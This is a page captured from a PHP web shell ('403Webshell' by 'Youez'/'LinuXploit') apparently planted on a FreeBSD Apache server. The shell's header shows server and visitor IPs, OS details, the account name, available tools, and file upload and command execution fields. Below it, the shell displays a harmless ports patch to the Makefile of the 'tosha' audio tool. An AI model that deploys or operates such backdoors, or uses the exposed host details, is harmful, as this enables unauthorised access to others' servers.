403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/audio/tosha/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/audio/tosha/files/patch-Makefile
--- Makefile.orig	1998-12-16 12:34:09 UTC
+++ Makefile
@@ -17,7 +17,7 @@ MANDIR=$(PREFIX)/man
 ###################################################
 
 CFLAGS?=-O2
-CFLAGS+=-Wall -ansi -DGLOBAL_ETC_DIR=\"$(ETCDIR)\"
+CFLAGS+=-Wall -DGLOBAL_ETC_DIR=\"$(ETCDIR)\"
 
 .if (exists(/usr/include/camlib.h))
 CFLAGS+=-DCAM
@@ -53,15 +53,10 @@ pcmfade:	pcmfade.o utils.o
 	$(CC) $(CFLAGS) -o pcmfade pcmfade.o utils.o
 
 install:	$(BINS)
-	strip $(BINS)
-	install -s -g bin -o bin -m 755 $(BINS) $(BINDIR)
-	install -c -g bin -o bin -m 644 tosharc $(ETCDIR)
-	install -c -g bin -o bin -m 644 tosha.1 pcmplay.1 pcmfade.1 \
-		$(MANDIR)/man1
-.if !defined(NOMANCOMPRESS)
-	cd $(MANDIR)/man1 ; \
-	$(GZIP_CMD) tosha.1 pcmplay.1 pcmfade.1
-.endif
+	$(BSD_INSTALL_PROGRAM) $(BINS) $(DESTDIR)$(BINDIR)
+	$(BSD_INSTALL_DATA) tosharc $(DESTDIR)$(ETCDIR)
+	$(BSD_INSTALL_MAN) tosha.1 pcmplay.1 pcmfade.1 \
+		$(DESTDIR)$(MANDIR)/man1
 
 clean:
 	rm -f $(OBJS) *core $(BINS)

Youez - 2016 - github.com/yon3zu
LinuXploit